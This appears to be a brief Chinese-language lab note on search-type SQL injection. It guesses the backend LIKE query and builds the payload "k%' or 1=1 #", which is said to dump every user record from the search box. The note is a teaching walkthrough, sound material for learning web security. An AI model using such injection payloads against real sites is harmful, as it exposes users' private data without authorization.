SQL注入-搜索型
输入k字段进行搜索发现出用户信息
通过上图搜索可以猜测的sql语句为
select 字段1,字段2 from 表名 where username like '%k%';
在后台查询结果
select id,email from member where username like '%k%';
通过以上猜测进行构造payload语句
like '%k%' or 1=1 #%';
下面的payload语句构造完毕
k%' or 1=1 #
将payload输入搜索框会发现所有用户信息已出现
后台代理逻辑,通过前端传入参数
